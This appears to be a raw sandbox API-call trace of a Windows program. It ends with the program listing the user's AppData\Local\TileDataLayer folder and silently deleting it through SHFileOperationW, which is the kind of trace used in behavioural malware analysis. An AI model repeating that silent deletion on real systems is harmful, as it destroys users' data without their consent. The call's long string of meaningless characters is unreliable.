[0203.261] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0203.261] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0203.261] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0203.261] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0203.261] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0203.261] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0203.261] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0203.262] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0203.262] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0203.262] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0203.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0203.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f71a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0203.262] CryptReleaseContext (hProv=0xa7c7f8, dwFlags=0x0) returned 1 [0203.262] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0203.262] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0203.262] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0203.262] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0203.262] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0203.262] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0203.262] FreeLibrary (hLibModule=0x76390000) returned 1 [0203.262] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0203.262] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0203.262] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.262] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.262] CloseHandle (hObject=0x468) returned 1 [0203.263] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.263] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0203.263] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0203.263] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0203.264] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/TileDataLayer", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpFilePart=0x8cedf4*="TileDataLayer") returned 0x2b [0203.264] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer")) returned 0x10 [0203.264] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2fbd0ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3cdbf8a7, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1eb8 [0203.265] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2fbd0ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3cdbf8a7, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0203.265] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8e73b662, ftLastAccessTime.dwHighDateTime=0x1d5d80d, ftLastWriteTime.dwLowDateTime=0x8e73b662, ftLastWriteTime.dwHighDateTime=0x1d5d80d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Database", cAlternateFileName="")) returned 1 [0203.265] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8e73b662, ftLastAccessTime.dwHighDateTime=0x1d5d80d, ftLastWriteTime.dwLowDateTime=0x8e73b662, ftLastWriteTime.dwHighDateTime=0x1d5d80d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Database", cAlternateFileName="")) returned 0 [0203.265] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0203.266] GetLastError () returned 0x12 [0203.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0203.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0203.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0203.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0203.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0203.266] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0203.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0203.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0203.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0203.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0203.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0203.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0203.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0203.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0203.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0203.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0203.266] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0203.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0203.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0203.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa720 [0203.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0203.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0203.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa570 [0203.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0203.267] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0203.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0203.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0203.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0203.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0203.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0203.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0203.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0203.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0203.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0203.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0203.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0203.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0203.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0203.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0203.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0203.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0203.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0203.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0203.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0203.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0203.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0203.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0203.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0203.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0203.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0203.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0203.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0203.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0203.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0203.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0203.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0203.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0203.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0203.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0203.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0203.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0203.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0203.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x58) returned 0x2a5fb40 [0203.268] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/TileDataLayer", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpFilePart=0x8cf650*="TileDataLayer") returned 0x2b [0203.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fb40 | out: hHeap=0x2af0000) returned 1 [0203.269] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer")) returned 0x10 [0203.269] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫